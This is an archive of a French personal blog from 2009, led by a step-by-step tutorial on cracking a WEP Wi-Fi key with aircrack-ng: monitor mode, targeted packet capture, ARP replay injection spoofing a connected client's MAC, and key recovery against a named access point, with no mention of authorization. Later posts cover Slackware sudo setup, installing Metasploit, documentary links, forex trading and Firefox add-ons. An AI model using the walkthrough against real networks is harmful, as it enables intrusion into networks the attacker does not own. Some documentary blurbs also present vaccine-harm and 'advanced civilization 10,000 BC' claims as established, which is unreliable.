jeudi 24 décembre 2009

Cracké une cle WEP (injection ARP)



Scénario:

-Point d'accès wi-fi (AP) protégé par une clé WEP avec un ou plusieurs clients connecté

logiciels  requis:

1- Un sniffer pour pouvoir exploré le réseau et détecté les points d'accès (AP) et les clients connecté

2-Un injecteur de pâques pour stimulé le réseau afin de récupéré un max de DATA

3-un cracker pour pouvoir déchiffré la clé wep

je vous conseille la suite Aircrack-ng  qui contient tous les outilles nécessaire [airodump-ng, aireplay-ng, aircrack-ng, airmon-ng]

ou bien vous pouvez Utilisé la distribution
BackTrack,(en live cd ou avec une clé usb)
Backtrack contient tous ce qu'il faut pour ce tutoriel

NB: je précise que j'utilise un système d'exploitation "Linux"


Notation:

MAC: adresse mac de ma carte wi-fi
BSSID : adresse MAC du point d'accée
ESSID: nom du point d'accès
Channel: le canal du point d'accès ( de 1 jusqu'à 12)

Un peut de théorie:

le WEP est un mécanisme simple de chiffrement de données, ce cryptage travaille avec l’algorithme RC4 pour chiffrer les données et utilise des clés statiques de 64 ou 128 bits

Le principe du WEP consiste à définir une clé sécrète qui doit être déclarée au niveau de chaque adaptateur sans fil du réseau (Clients) ainsi que sur le point d’accès (AP).
La clé sert à créer un nombre pseudo-aléatoire d’une longueur égale à la longueur de la trame. Chaque élément du réseau voulant communiquer entre eux doit connaître la clé secrète qui va servir au cryptage WEP. Une fois mis en place, toutes les données transmises sont obligatoirement cryptées. Il assure ainsi l’encryptage des données durant leur transfert ainsi que leurs intégrités.

pour les failles on peut cité:
- le cryptage RC4 présente des faiblesses.
- La clé de session partagée par toutes les stations est statique. Cela signifie que pour déployer un grand nombre de stations WiFi, il est nécessaire de les configurer en utilisant la même clé de session – ceci ayant pour conséquence que la connaissance de la clé est suffisante pour déchiffrer les communications.
- De plus, 24 bits de la clé servent uniquement pour l’initialisation, ce qui signifie que seuls 40 bits de la clé de 64 bits servent réellement à chiffrer et 104 bits pour la clé de 128 bits.

Pour pouvoir cracké cette clé WEP on vas:

1-sniffer le réseau pour voir les points d'acceé
2-stimulé le trafique en injectant des paquets pour récupéré le max de clé de session
3-cracké les clé de session pour avoir la clé

Pratique:

1- mètre la carte Wi-Fi en mode moniteur avec "airmon-ng":

[le mode moniteur veut dire que notre carte wi-fi vas écouté sur le réseau et récupéré les Pâques même si ils ne sont pas destiné a nous]

________________________________________
[root@darkstar dragoun]# iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wmaster0  no wireless extensions.

wlan0          IEEE 802.11bg  Mode:Managed  Frequency:2.462                        Retry min limit:7   RTS thr:of Fragment thr=2352   
__________________________________________________

Dans ce cas ma carte wi-fi est wlan0 et elle est en mode Managed

________________________________________
[root@darkstar dragoun]# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon0)
 _________________________________________________

notez que le mode moniteur est activé sur mon0, c'est parce que ma carte est une Atheros elle peut crée des carte virtuelle

on peut vérifier avec iwconfig

________________________________________
[root@darkstar dragoun]# iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0    IEEE 802.11bg  ESSID:""
             Mode:Managed  Frequency:2.412 GHz 
            Retry min limit:7   RTS thr:off   Encryption key:off
            Power Management:off
            Link Quality:0  Signal level:0  Noise level:0
            Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid
mon0    IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz                Retry min limit:7   RTS thr:off   Fragment thr=2352 B
               Encryption key:off
               Power Management:off
               Link Quality:0  Signal level:0  Noise level:0
               Rx invalid nwid:0  Rx invalid crypt:0 
________________________________________


2-Sniffer le réseau et détecté les points d'accès et les clients:

[root@darkstar dragoun]# airodump-ng mon0

qui me renvoi ce résultat





1: BSSID => adresse MAC du point d'accée
2: #DATA =>les pâques récupéré,qui vont servir a avoir la clé WEP
3: ENC => type de cryptage [ dans ce cas WEP]
4: ESSID => Nom du point d'accé
5: STATION => L'adresse MAC d'un client qui est connecté sur le point d'accès
-j'ai oublier d'encadré: CH (entre #DATA et ENC) => canal du point d'accès

maintenant qu'on a l'adresse MAC de (AP) et le canal on vas commencé a sniffé sur ce canal avec la commande suivante :

[root@darkstar dragoun]# airodump-ng -w /home/crack/crack-wep -c 1 -b 00:90:D0:DC:B1:E2 mon0

-w: le fichier ou on vas sauvegardé les pâques capturé (qui sera utilisé par aircrack-ng âpre)
-c 1 : sniffé sur le canal 1
-b: sniffer seulement les pâques émis par cette adresse MAC 00:90:D0:DC:B1:E2 (AP)
mon0: interface a utilisé

ce qui renvoi le résultat suivant



on remarque qu'on 1e minute on a récupéré 2077 #DATA

pour cracké une clé de 64 bits il nous faut minimum 10.000 data et pour une 128 bits il faut 50.000 data, ou plus

dans ce cas on ne connais pas le type de la clé, supposant qu'elle soit une 128 bits

3- Injecter des paquet:

afin d'avoir nos 50.000 DATA rapidement on vas encore stimulé le réseau en envoyant des pâques ARP a l'AP en utilisant l'adresse MAC du client connecté comme adresse source (spoofé l'adresse MAC du client)


[root@darkstar dragoun]# aireplay-ng -3  -e SpeedTouch345B2D -a  00:90:D0:DC:B1:E2  -h 00:19:7E:01:A3:70 mon0


- 3 : pour dire qu'il faut injecter des pâques ARP
- e : nom du point d'accés
- a : adresse MAC du point d'accès
- h : adresse MAC du client (pour faire croire que les pâques viennent de lui)
mon0: interface wi-fi


- Apré 15 minutes on remarque qu'on a récupéré 56.689 DATA ce qui  suffit même pour une clé 128 bits




4- cracké les paquets:

 on récupéré le fichier enregistré avec airodump-ng et on en le crack avec aircrack-ng

[root@darkstar dragoun]# aircrack-ng /home/crack/crack-wep-01.cap -b 00:90:D0:DC:B1:E2

crack-wep-01.cap : fichier sur le quele on a sauvegardé les
                   pâques avec airodump-ng

-b: adresse de AP



KEY FOUND!===> en ASCII sa donne :"aabbccddeeff1"



mardi 20 octobre 2009

Gestionnaire de paquet pour Gnu/Linux Slackware


Pour installer des logiciels sur Gnu/Linux Ubuntu [Debian] on utilise "apt-get" ou bien le gestionnaire graphique (installer par défaut)...
Voici un équivalent pour Gnu/Linux Slackware :
"slapt-get" (en ligne de commande ) ou bien "Gslapt" (gestionnaire graphique)

::Telecharger Slapt-Get et Gslapt::

Ps: après l'installation vous trouvez Gslapt dans "K==>Système==>Gestionnaire de paquet Gslapt"

vendredi 16 octobre 2009

Ajouter un utilisateur au "sudoer" sur Gnu/Linux Slackware














j'ai remarque qu'a pré l'installation de "Gnu/Linux Slackware" il n'y avais que le compte 'root' et le système se log automatiquement sur ce compte.. alors l'idéal est de crée un utilisateur simple mais qui peut avoir les droit "root" si nécessaire en utilisant "sudo"

1- crée un utilisateur


il faut se logé en autan que 'root' et tapez cette commande:
root#: adduser nom_d'utilisateur

2- Ajouter l'utilisateur au groupes

en gros il y'a des groupes et l'utilisateur doit en faire partie pour pouvoir accédé au fonction de
chaque groupe, on vas ajouté l'utilisateur qu'on a crée a ces groupes:
"
cdrom, audio, video, scanner,wheel,plugdev et power".
pour sa il y a plusieurs méthodes,
par exemple on utilisant la commande
root# gpasswd -a nom_d'utilisateur nom_du_groupe
Exempl: root$ gpasswd -a tifo plugdev
cette ligne vas ajouté l'utilisateur tifo au groupe plugdev

ou bien on vas édité manuellement le fichier "/etc/groupe" et ajouter l'utilisateur a chaque groupe
root# nano /etc/group
et on ajouter le nom du nouveau utilisateur comme indiqué
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:!:10:root,nom_d'utilisateur
floppy:x:11:root,nom_d'utilisateur
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root,nom_d'utilisateur
video:x:18:root,nom_d'utilisateur
cdrom:x:19:root,nom_d'utilisateur
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root,nom_d'utilisateur
power:x:84:root,nom_d'utilisateur
.
....
3-Ajouter l'utilisateur dans "/etc/sudoers"

cela vas permettre a l'utilisateur d'exécuter les commande destiné qu'au "root"
root# nano /etc/sudoers
repérez cette ligne :
# Uncomment to allow people in group wheel to run all commands
# %wheel ALL=(ALL) ALL

et décomentez la ce qui donne sa:
# Uncomment to allow people in group wheel to run all commands
%wheel ALL=(ALL) ALL

Redémarrez et logé vous avec le nouveau utilisateur

une fois qu'on a crée notre utilisateur et on l'a ajouté au différents groupes pour pouvoir exécuté des commandes 'root' en utilisant 'sudo'.
tout fois il reste un tous petit problème a réglé.
si vous asseyez d'exécuter la commande 'reboot' par exemple ou bien 'lsusb' vous aurez une erreur qui dit que cette commande n'existe pas... :/
en fét pour exécuté 'reboot' vous devez taper ceci
utilisateur$ sudo /sbin/reboot
et pas seulment que pour 'reboot' mais pour tous les commande du 'root' vous deviez spécifier le chemin complet de la commande se qui n'est pas pratique.
pour remédier a ça on doit ajouté 2 fichier .bashrc et bash_profile

4- Creé .bashrc et .bash_profile


sur Slackware les fichiers ".bashrc" et ".bash_profile" n'existe pas par défaut alors on vas les crée dans votre repertoir personnel: "/home/nom_d'utilisateur/.bash_profile"
si votre nom d'utilisateur est tifo (a titre d'exemple)
alors sa sera :
utilisateur$ sudo nano /home/tifo/.bash_profile
copier /colle ce code sur le fichier et enregistré le
_______________________
# .bash_profile

# Source .bashrc
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
_______________________

maintenant on vas crée le ".bashrc
" toujour dans /home/tifo/.bashrc qui vas contenir:

$PATH: c'est ce qu'on appelle les variables d'environnements qui vont nous permettre de trouvé les commandes (pour évité d'écrire a chaque foi '/sbin/reboot' par exemple)
$PS1: c'est l'invite de commande. Exemple: [tifo:~]$
Les alias: c'est une sorte de raccourcie qu'on crée, par exemple au lieu d'écrire a chaque fois 'clear' on lui met une alias cls='clear' et rien qu'on tapant cls alors clear sera exécuté

utilisateur$ sudo nano /home/tifo/.bashrc

et copier/coller ce code:
_______________________
#.bashrc

# Le chemain
export PATH="$PATH:$HOME/bin:/sbin:/usr/sbin/:/usr/bin"

# Dynamic resizing
shopt -s checkwinsize

# custom prompt
PS1="\[\e[36;1m\][\u:\w]$ \[\e[0m\]"

# Les alias
alias l='ls'
alias la='ls -a'
alias lal='ls -al'
alias ll='ls -l'
alias lsd='ls -d */'
#pour étre sure
alias rm='rm -i'
alias mv='mv -i'
alias cp='cp -i'
________________________

une dernier chose, il faut crée .bashrc dans le dossier /root/ aussi

utilisateur$ sudo nano /root/.bashrc


Copier/coller

________________________
#/root/.bashrc

#resize text
shopt -s checkwinsize

#custom prompt
PS1="\[\e[35;1m\][\u@\h \W]# \[\e[0m\]"

# Les alias
alias l='ls'
alias la='ls -a'
alias lal='ls -al'
alias ll='ls -l'
alias lsd='ls -d */'
#pour étre sure
alias rm='rm -i'
alias mv='mv -i'
alias cp='cp -i'
________________________

j'espère que j'ai rien oublier :P
vos commentaire, vos correction, vos proposition sont les bienvenue :)

mardi 13 octobre 2009

MobiConnect sur Gnu/Linux (KDE)

Voici un petit tuto sur comment configuré la clé internet "Mobiconnect" sur un system Gnu/Linux 'KDE' [tester sur "Slackware 12.2"]

on a besoin du logiciel "KPPP", si vous ne le trouvez pas dans 'K==>Internet==>KPPP'

vous pouvez le télecharger librement et gratuitment
:: Telecharger KPPP::
____

#executé KPPP







# Dans l'ongle "Comptes" selectioné
"Nouveau==>Configuration de l'appele"














#Editez l'ongle "numerotation" comme le mentre l'image
-lessez les autre ongles avec les valeurs par defaut
(Clické pour agrendiqre)













# pour la configuration du modem selectionez l'ongle
"modem"
en suit "Nouveau"

















# dans l'ongle "périphérique"
metez les valeurs comme le montre l'image:

















#Dans l'ongle "modem" verifier les "commandes du modem"


















#Si les commandes ne sont pas définit, definissez les telle que le mentre
l'image (Clické pour agrendiqre)

.

















# le nom d'utilisateur et le mots de passe: " internet"







# Etat et details de connections

vendredi 9 octobre 2009

Linux Kernel in a Nutshell


C'est un livre écrit par un des principaux développeurs du noyau Linux (Greg Kroah-Hartman), publié par O'Reilly. Ce livre donne une vue d'ensemble complète sur la configuration du noyau et la compilation. Il se base sur le noyau 2.6.18.

Il est assez concis, car Il est rédigé comme une référence rapide.

Le livre est disponible en téléchargement gratuit
langue du livre : anglais

Page web du livre et de téléchargement : > ICI <

mercredi 30 septembre 2009

METASPLOIT UNLEASHED - MASTERING THE FRAMEWORK


Voici une formation gratuite est très complete sur le framework Metasploit. Cette action a pour but de soulever des fonds pour les enfants pauvres d'afrique. Cette formation a été conçue et réalisée par plusieurs professionels de la sécurité. Si vous trouvez ce cours utile et intéressant, merci de faire un dont à :IHS Home of Johnny Long and Hackers for Charity, Inc

Lien : ===> METASPLOIT UNLEASHED - MASTERING THE FRAMEWORK

mardi 1 septembre 2009

Metasploit sur Linux Ubuntu


Voici ce qu'il faut pour installer Metasploit sur Ubuntu

Commencez par installer les libraire suivant :

#sudo apt-get install subversion ruby libruby rdoc libyaml-ruby libzlib-ruby
#sudo apt-get install libopenssl-ruby libdl-ruby libreadline-ruby
#sudo apt-get install libiconv-ruby rubygems libgtk2-ruby libglade2-ruby


en suit téléchargez Metasploit 3.2 :

http://spool.metasploit.com/releases/framework-3.2.tar.gz


Décompressé le paquet:

#tar -zxvf framework-3.2.tar.gz


Faire les mis a jours si nécessaire

#sudo svn update


Exécuté : (positionnez vous dans le dossier décompressé)

# ./msfconsole (pour la console)
# ./msfgui (pour l'outille graphique)
# ./msfweb (pour l'interface web)


Enjoy :P


=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux

msf >

jeudi 20 août 2009

Voyage au cœur d'un trou noir [Documentair]


Ce voyage imaginaire vers un trou noir nous est presque familier, et pourtant, il est contraire aux lois de la physique, comme l'explique Alain Riazuelo, astrophysicien à l'Institut d'astrophysique de Paris, dans une nouvelle modélisation des plus décoiffantes.


Durée de la vidéo : 37 minutes



Lien vers la vidéo


lundi 17 août 2009

Ce qu'Einstein ne savait pas encore [Documentaire]


Einstein a toujours rêvé d'une théorie unique qui définirait le fonctionnement de l'univers dans son ensemble, regroupant la relativité générale et la mécanique quantique. les scientifiques seraient, avec la théorie des cordes, sur le point de la découvrir. Si cette théorie se vérifie, notre perception de l'univers qui nous entoure s'en trouvera complètement chamboulée.


Durée de la vidéo : 2 heures 10 en 3 parties

Partie 1


Partie 2
partie 3
Télécharger la vidéo [FLV]

dimanche 16 août 2009

Stonehenge grandeur nature [Documentaire]


C’est dans la plaine de Salisbury ,érigé entre -2800 et -1100[1], du Néolithique à l'âge du bronze., le plus beau monument mégalithique d’Europe. Stonehenge fascine archéologues et astronomes.
Stonehenge n’a pas encore livré tous ses secrets. Etait-ce un temple, un monument funéraire ou un observatoire astronomique ?

Durée de la vidéo : 1h 18 minutes
Lien vers la vidéo





samedi 15 août 2009

Civilisation avancée 10 000 ans avant J-C ? [Documentaire]


Selon ce qu'il nous a été enseigné depuis le plus jeune âge, la Terre, il y a 10000 ans, était peuplée par des hommes primitifs, sans qu'il soit ne serait-ce qu'un instant question de civilisation...
Le fait est que ce documentaire sur l'Egypte antique bouscule profondément nos acquis en apportant des preuves irréfutables selon lesquelles le concept de civilisation avancée serait bien plus ancien qu'on voudrait le croire.

Durée de la vidéo : 52 minutes

Lien vers la vidéo
Télécharger la vidéo



samedi 25 juillet 2009

La Franc-Maçonnerie [Documentaire]



Ce numéro de Question à la Une, diffusé sur la RTBF (Belgique) contient 2 reportages qui tentent de répondre aux questions suivantes :
"Quel est le vrai pouvoir des franc-maçon ?"
"Le secret maçonnique: porte-ouverte aux dérives ?"

Il constitue une excellente base de réflexion pour toute personnes sachant garder un esprit critique.

Durée de la vidéo : 50 minutes

Lien vers la vidéo
Télécharger la vidéo





vendredi 24 juillet 2009

Les OGM, c'est quoi ? [Documentaire]


Êtes-vous bien sûrs de posséder tous les éléments de base pour comprendre la question des Organismes Génétiquement modifiés (OGM) ?
Au vu du contenu de cette conférence, rien n'est moins sûr !

Christian Vélot, Maître de conférence en génétique moléculaire (Université Paris-Sud XI), chercheur a l'institut de génétique et de microbiologie (centre scientifique d'Orsay) a donné de nombreuses conférences, mettant le projecteur sur les concepts et les pratiques en matière de génie génétique.

Dans cette conférence, donnée a Toulouse en 2005, il donne une explication scientifique très pédagogique de ce que sont les OGM et articule cet exposé autour de trois axes :
  • OGM et recherche fondamentale
  • OGM et médecine
  • OGM dans l'agroalimentaire
Ces 3 axes sont les principaux domaines d'application de la technologie OGM.

Cette conférence, en plus de vous donner tous les outils pour comprendre le sujet des OGM, soulève les questions éthiques et met les doigt sur les éventuelles conséquences sanitaires et environnementales.

Durée de la vidéo : 1h26

Lien vers la vidéo
Télécharger la vidéo [Partie 1]
Télécharger la vidéo [Partie 2]


jeudi 23 juillet 2009

Échelon, le pouvoir secret [Documentaire]



Aujourd'hui, il existe une grande puissance qui espionne le monde. Vos communications téléphoniques, vos e-mails, vos fax, vos télex, peuvent être interceptés par d'immenses oreilles qui écoutent la planète entière. Aujoud'hui, une grande puissance arrive à lire via satellite le titre du journal que vous lisez à la terrasse d'un café, et bientôt elle lira les articles eux-même. Aujoud'hui, il existe une puissance capable de filtrer les conversations téléphoniques d'un pays entier, de les trier, de les recouper grâce à des ordinateurs capables de recherches intelligentes et thématiques, indexées par mots clefs. Cette grande puissance, c'est l'Amérique.

Les Etats-Unis ont développé au cours de la guerre froide, avec la Grande-Bretagne, le Canada, l'Australie et la Nouvelle-Zélande, un immense système d'écoute nommé projet F415 dit Échelon. Aujourd'hui la guerre froide est finie, mais ces grandes oreilles placées aux quatre coins du monde servent encore...

De l'Anti-terrorisme à la surveillance de ses propres citoyens, de l'espionnage militaire à l'espionnage économique de toutes les plus grosses entreprises mondiales, le système Échelon, développé par la National Security Agency (NSA), sert beaucoup plus qu'on ne veut bien le croire ou le dire, et ses nouvelles activités en grande partie illégales constituent un atout majeur pour la puissance commerciale, militaire et technologique des États-Unis.

Enjeu majeur du début du 3ème millénaire, la guerre de l'information n'en est qu'à ses débuts...

Durée de la vidéo : 1 heure 20

Lien vers la vidéo
Télécharger la vidéo [MP4]



Silence, on vaccine ! [Documentaire]


Documentaire canadien de Lina B. Moreco

De nos jours, l'enfant nord-américain reçoit environ 48 doses de 14 vaccins différents avant l'âge de six ans, soit le double du nombre prescrit 25 ans auparavant.

Des recherches en cours semblent indiquer que la vaccination serait directement responsable de désordres immunitaires ou neurologiques chez certaines personnes prédisposées génétiquement ou neurologiquement à mal réagir aux composantes des vaccins. Autisme, sclérose en plaque, syndrome de Guillain-Barré, myofasciite à macrophages, encéphalites, paralysies, neuropathies et autres; la liste des maladies répertoriées indique bien la gravité de la situation.

Avec Silence, on vaccine, Lina B. Moreco trace un portrait inquiétant de cette problématique qui touche l'ensemble de la société. Tourné au Québec, en France et aux États-Unis, son documentaire souligne l'ampleur du phénomène. Outre les victimes, les familles et les citoyens, des chercheurs de haut niveau donnent leur avis sur la question et aident à démythifier les processus complexes régissant les effets secondaires de la vaccination.

Loin de rejeter les avantages indéniables et largement documentés de la vaccination pour l'ensemble de la population, Silence, on vaccine met en lumière la nécessité de soutenir des recherches pour mieux comprendre les effets à long terme des vaccins et ainsi mieux protéger la minorité à risque. Ce documentaire profondément humain soulève une question aussi fondamentale que troublante : combien de personnes peut-on accepter de sacrifier dans le silence au nom du bien commun ?

Durée de la vidéo : 50 minutes

Lien vers la vidéo
Télécharger la vidéo [FLV]




Find my iPhone / outil de surveillance ?

Vous n’avez pas encore de puce sous-cutanée équipé d’un GPS ?

Aucun problème, vous aurez bientôt le nouvel iPhone et sa fonction Find my iPhone qui, garce au site mobileme vous permettra de localiser votre iphone égarer ou de connaître le lieu de votre enfant ou encore d’espionner votre mari.



Une option permet même d’effacer tout le contenu de votre téléphone !



La technologie et c’est bienfaits … on arrête pas le progrès !

P.S. : restez de braves citoyens, consommez sans crainte, on vous as a l'oeil ...

mardi 7 juillet 2009

Dark side of Facebook...



Facebook un véritable phénomène du net, c’est le réseau social en ligne le plus important au monde, plus grand que Myspace, il compte pres de 75 millions d’inscrit de 80 pays, Facebook donne la possibilité d’avoir un espace personnel sur le net et favorise la communication, une seul fois le contact établi avec une personne il est possible d'envoyé et de recevoir des messages,des photos et d’autre contenue
Plus que sa Facebook se veut presque un club de rencontre .

Mais facebook a une face caché..celle de Big Brother



En vous inscrivant et en utilisant facebook vous aller fournir votre (état civil,vos centres d'intérêts, âge, sexe, options politique , adresse, @mail, travaille, ami , son quotidien) et n’importe qui peut en apprendre plus qu’il n’en faut sur votre petite personne. Les gens on tendance a oublier que leurs amis ne sont pas les seul a fréquenter ces réseaux qui sont de vraies mines d’or pour les sociétés de marketing, ou même pour leur futur employeur avant un entretien d’embauche.

En lisant les conditions d’utilisation j’étais surpris par pas mal de passage telle que

"...Lors de son inscription, le nouveau membre accepte que l’entreprise utilise toutes les données qu’il rentrera sur le site, que ce soit à des fins publicitaires ou autres..."

"...Facebook peut également collecter des informations sur vous à partir d'autres sources, comme les journaux, les blogs, les services de messagerie instantanée ou par l'intermédiaire des autres utilisateurs Facebook..."


"...Comme beaucoup d'autres sites Internet qui interagissent avec des sites tiers, nous pouvons recevoir certaines informations même si vous n'êtes pas connecté à Facebook. Ces informations peuvent concerner des personnes qui n'utilisent pas Facebook et provenir de sites tiers dans le cadre des opérations techniques du système..."

Tous sa est bénéfique pour qui ? les entreprise de marketing bien sur pour une meilleur publicité, une publicité ciblé.L’une des technique utiliser c’est on récupérant les contenu de votre profile (l’age et le sexe par exemple) on peut mieux déterminer le type d’offre et de produits a vous soumettre

s’ajoute a cela le programme beacone qu’utilise facebook et qui est décrit comme suit

"...Projet Beacon est un projet interne qui permettra à Facebook de recueillir des informations sur l'achat de ses utilisateurs sur les sites de commerce électronique de tiers, en échange de publicité gratuite dans les médias en provenance de ces tierces parties..."

Cela veut dire que si on vas sur un site d’achat (qui utilise le programme beacon) et on achète des produits, en se connectant sur facebook on aura la lise de ce qu’on a acheter sur le site tierce, sa serai visible a nos amis aussi

Plus loint encor... le site vient d'annoncer que les grandes marques pourront bientôt s'inscrire en tant que membres sur le réseau social, et donc... devenir vos amis, consulte votre profil et centres d'intérêts. C’est la meilleur manier pour vous spammer de publicités personnalisées, et parfaitement ciblées. Effet cascade, le membre qui va entrer en contact avec une page d'une entreprise va aussi ouvrir l'accès de cette entreprise à tout votre carnet d'amis. Les annonceurs pourront alors envoyer des publicités ciblées aux membres, et à leur carnet d'amis... Du spam organisé

Une autre condition d'utilisation déclare que
"..touts les informations seront transmissent au USA.."

si on combine cette condition avec les conditions cité plus haut on peut facilement en conclure que ces donner sont une propriété exclusif des USA....Pk pas la [CIA]
cette vidéo en dira plus

Big brother nous observe. Observons-le aussi

dimanche 5 juillet 2009

Plus besoin de s'incrir avec BugMeNot



On est souvent confronter a des message du style "You must create an account to see this page" qu'on trouve dans les forums ou certain site de téléchargement, et pour s'inscrire on doit fournir des info personnelle [date de naissance/vile...etc] (pk tans d'info ? --c'est pour mieux nous tracer)..
et c'est la qu'intervien BugMeNot, c'est un site qui propose une grande base de donnée des couple Login/Password pour divers sites, Desormer plus besoin de s'incrire et de remplire des formulaire fastidieux vous n'avais qu'a vous rendre sur le site http://www.bugmenot.com ,taper un site et il vous donne des logins disponibles

il est egalment disponible en module complaimentair pour firefox
BugMeNot add-on

ScreenShot

samedi 4 juillet 2009

Le Marché du forex ..



La Bourse a porter d'un clic , avec le marché du Forex désormais c'est possible mais avant d'aller plus loin ....

C'est quoi le Forex ?

Le mot FOREX est issu de la contraction des termes anglais Foreign Exchange, c'est le surnom universellement donné au marché des changes , sur lequel les monnaies (devises) sont échangées l’une contre l’autre en temps réel, à des taux de change qui varient sans cesse. Ou d'un autre terme c'est la bourse des devises

Après avoir été un marché interbancaire uniquement il est depuis quelques années ouvert aux particuliers et investisseurs voulant diversifier leurs placements ou purs spéculateurs.
La particularité de ce marché mondial c'est qu'il dispose d'une grande liquidité des produits les plus traités (Devise), telle que la parité (euro/dollar).

Ce qui est intéressant c'est qu'on peut faire du Trading en ligne via internet (Oui.. Du Trading comme les mec qu'on vois a la télé entrain de parler avec des signes de main qu'on arrive pas a déchiffré ^^ )


Comment se faire de l’argent sur le forex

Tous l’astuce consiste dans l’échange des paires de devise (exemple: euro/dollars)
A l’instant ou j’écris ces lignes le taux de change est a
1 Euro = 1.3977$
mais cette valeur est soumise a des changement due a beaucoup de chose telle que l’actualité économique ou politique, alors si j’achète le dollars et que d’ici 5minutes (peut être moins car le marcher est très dynamique) le taux de change sera de 1 Euro = 1.5977$ je constate que je peut faire un bénéfice si je vend le dollars que j’ai acheter (je le vendrai plus chére que le prix d'achat) ce qui me fera un bénéfice de 0,2977$ par chaque unité échangé.

-L’échange peut se fait sur plusieurs pair (EUR/USD | GBD/USD | GBD/JPY....etc)

Pour pouvoir accédé au marché des changes pour les particuliers on doit passer par les brokers du forex.

Broker de forex, c'est quoi ?

Un Broker est un Courtier En Ligne, une société de trading réglementée. C’est lui qui vas nous permet de passer nos ordres de bourse, et pour cela on doit se connectant sur son site Internet, ou bien par l’intermédiaire d’un logiciel.

Ce qui vaut le détour c’est que les broker nous donne la possibilité de crée des comptes gratuitement et nous
permet de s’entrainé avec des somme d’argent virtuelle, avant d’investir avec de l’argents réel,
Le seul petit HIC c’est que malgré que l’Algerie n’est pas considéré comme un paye a risque , les comptes de crédit en devise (permettant de faire ce genre de transaction) sont de minimum 2000 Euro, Disponible dans les banques CPA et AGB)alors que la somme minimal exiger par les broker est 100$. comme alternative il faut une carte bleu ou une carte de crédit étrangère ou bien un compte PAYPAL

Ok ok tous sa c’est bien mais on s'y prend comment pour faire tous sa ?

C’est simple il suffit de choisir un broker et de se lancer, de tout façon avec les compte d’entrainement on risque rien

Il suffit d’aller sur cette adresse http://www.forex.fr/ il y a pas mal d’informations et ils propose une liste des meilleur Broker

[Personnellement J’ai essayer le Broker ACM, il est Bien et il propose un support d’aide en ligne et une assistance téléphonique personnelle (Oui.. :) ) vous vous inscrivez et votre agent vous rappelle dans les 30 minutes qui suit , tous sa pour dire que c’est vraiment sérieux ]


Finalement Sa consiste a faire du trading en ligne mais comme tout tarder qui se respect on a besoin d’outilles et c’est pas ce qui manque

Il y a des sites d’actualité orienté économie e brousse telle que :
http://fr.reuters.com/ ou bien http://www.bloomberg.com/

Il y a des outilles d’analyse graphique
Analyse Graphique

Et les Convertisseur de devises
Convertisseur

En fin je croix que c’est les choses basic a connaitre sur le Forex, le domaine est très vaste et je ne peut touts explique ayant moi même des connaissance limité sur le sujet, mais touts vos questions, vos interrogations sont les bienvenue .... :^)

jeudi 2 juillet 2009

Cisco Lab Traning

Cisco Systems, Inc est une entreprise américaine qui est spécialiser dans la vente du matériel réseau et qui offre plusieurs solutions telle que la VoIP, la technologies sans fil Wi-Fi ou des Solutions de sécurité VPN .... etc



Le CLTE (Cisco Lab Training Engine) est un moteur de tests en ligne des Technologies Cisco.
Il est gratuit et vous permet de vous entraîner dans des conditions similaires à celles d'un véritable examen de certification Cisco.

Certifications académiques :
- CCNA 1 : Théorie des réseaux
- CCNA 2 : Configuration des routeurs et routage basique
- CCNA 3 : Commutation et routage intermédiaire
- CCNA 4 : Réseaux et technologies WAN

Il propose aussi des cours, des articles et un forum de discution

Les teste sont disponoble sur ce lien: http://clte.labo-cisco.com/

Firefox ++


Voici quelques modules complémentaires pour le navigateur web Mozilla Firefox qui peuvent vous être utiles.

ShowIP: Vous permet de voir l'adresse IP du site web que vous êtes entrain de visiter, il propose aussi des service telle que WHOIS et Netcraft

Shazou : fait une localisation géographique de n'importe quelle site web

Firebug : un outille pour les développeurs web, il permet de modifier, déboguer et suivre les CSS, HTML, JavaScript...

User Agent Switcher : Permet de changer l'entête "user agent" du navigateur

Tamper Data : permet de changer les entête HTTP/HTTPS

FoxyProxy : un outil de gestion de proxy qui remplace complètement les possibilités limitées de Firefox en matière de proxy.

Add N Edit Cookies : Ajoute et modifie les cookies

Fire Encrypter : une extension de cryptage/décryptage et des fonction de hachage

Dr.Web anti-virus link checker : Ce plug-in permet de vérifier avec la version en ligne de l’antivirus Dr.Web tout fichier que vous désirez télécharger, toute page que vous voulez visiter…

wibiya widget